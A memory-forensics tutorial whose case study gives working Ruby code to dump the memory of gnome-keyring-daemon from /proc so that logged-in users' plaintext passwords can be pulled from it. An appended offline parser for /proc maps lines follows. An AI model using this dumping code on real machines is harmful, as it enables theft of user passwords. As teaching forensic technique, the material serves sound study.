Memory Forensics

Linux memory

Dump Linux memory

To dump the memory of a specific Linux process to disk, we need the following:

  1. Get the process id (PID): /proc/[PID]/cmdline

    • cmdline is a file that holds the complete command line for the process.

  2. Get the PID maps: /proc/[PID]/maps

    • maps is a file containing the currently mapped memory regions and their access permissions.

  3. Get the process memory pages: /proc/[PID]/mem

    • mem is a file that can be used to access the pages of a process's memory through

Case study

Let's assume we want to dump the gnome-keyring-daemon process's memory to our disk in order to extract the logged-in user(s) password(s), since it is stored as plain text in memory. Moreover, we know that it comes after the "libgck-1" or "libgcrypt" strings in memory. We'll break that into parts, then put it together.

Get process id (PID)

@pids = []
# Only numeric /proc entries are processes; this skips /proc/self and /proc/thread-self
Dir.glob('/proc/[0-9]*/cmdline').each do |cmdline_file|
  # cmdline holds the NUL-separated argv; argv[0] is the program path
  argv0 = File.read(cmdline_file).split("\0").first.to_s
  next unless File.basename(argv0) == 'gnome-keyring-daemon'
  @pids << cmdline_file.split('/')[2].to_i # get the PID number from /proc/nnn/cmdline
end

Get PID maps:

@pids_maps = []
@pids.each do |pid|
  # Open and parse the maps file for each pid
  File.readlines("/proc/#{pid}/maps").each do |line|
    address, permissions = line.split(' ').first(2)
    # Keep only readable memory regions
    if permissions.match(/^r.*/)
      # Find where each region starts and ends; no need to dump the whole address space
      memory_start, memory_stop = address.split('-').map { |r| r.to_i(16) }
      chunk_size = memory_stop - memory_start
      @pids_maps << { pid: pid, memory_start: memory_start, memory_stop: memory_stop, chunk: chunk_size }
    end
  end
end

Get process memory pages:

memory_dump = ''.b # binary string, so appending raw bytes never raises an encoding error
@pids_maps.each do |region|
  # Reading another process's mem file requires ptrace access (root, or the same uid with a permissive ptrace_scope)
  File.open("/proc/#{region[:pid]}/mem", 'rb') do |mem| # Open the mem file
    mem.seek(region[:memory_start]) # put the reading pointer where the region starts
    memory_dump << mem.read(region[:chunk]).to_s # read the whole region
  rescue Errno::EIO
    # Some mappings (e.g. [vvar]) cannot be read through /proc/[PID]/mem; skip them
  end
end
File.open('gnome-keyring.dump', 'wb') { |f| f.print memory_dump } # Write the dump to disk as binary
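The snippets above only look at the first two columns of each maps line. As an added example that is not part of the original page, here is a Ruby parser for the full /proc/[PID]/maps line format (address range, permissions, offset, device, inode and optional pathname) that selects the regions actually worth reading through /proc/[PID]/mem. It runs offline over constructed sample lines; the addresses, inode numbers and region layout are invented, not taken from a real system.

```ruby
# Added example: parse /proc/[PID]/maps and plan which regions to read from /proc/[PID]/mem.
MapsRegion = Struct.new(:start, :stop, :perms, :offset, :dev, :inode, :path) do
  def size
    stop - start
  end

  def readable?
    perms.start_with?('r')
  end
end

# A maps line looks like:  address  perms  offset  dev  inode  [pathname]
#   7f0a2c000000-7f0a2c021000 rw-p 00000000 00:00 0
# The pathname is optional and may itself contain spaces, so split at most 6 times.
def parse_maps_line(line)
  fields = line.strip.split(/\s+/, 6)
  return nil if fields.length < 5
  start_s, stop_s = fields[0].split('-')
  MapsRegion.new(start_s.to_i(16), stop_s.to_i(16), fields[1], fields[2].to_i(16),
                 fields[3], fields[4].to_i, fields[5])
end

def parse_maps(text)
  text.each_line.map { |l| parse_maps_line(l) }.compact
end

# Regions that can be read via /proc/[PID]/mem: readable ones, minus [vvar],
# which the kernel refuses to expose there (read returns EIO).
def dumpable_regions(regions)
  regions.select { |r| r.readable? && r.path != '[vvar]' }
end

# Constructed sample maps content, not captured from a real process.
SAMPLE_MAPS = <<~MAPS
  55d5c0a00000-55d5c0a1a000 r--p 00000000 08:01 1234567 /usr/bin/gnome-keyring-daemon
  55d5c0a1a000-55d5c0a8c000 r-xp 0001a000 08:01 1234567 /usr/bin/gnome-keyring-daemon
  55d5c1f00000-55d5c2100000 rw-p 00000000 00:00 0       [heap]
  7f0a2c000000-7f0a2c021000 rw-p 00000000 00:00 0
  7f0a2c021000-7f0a30000000 ---p 00000000 00:00 0
  7ffd1a3e0000-7ffd1a3e4000 r--p 00000000 00:00 0       [vvar]
  7ffd1a3e4000-7ffd1a3e6000 r-xp 00000000 00:00 0       [vdso]
MAPS

# Returns [pathname, size_in_bytes] for every region the dumper should read.
def sample_dump_plan
  dumpable_regions(parse_maps(SAMPLE_MAPS)).map { |r| [r.path, r.size] }
end
```

The unreadable `---p` guard region and `[vvar]` are dropped from the plan, so the dumper neither wastes time on them nor aborts on EIO.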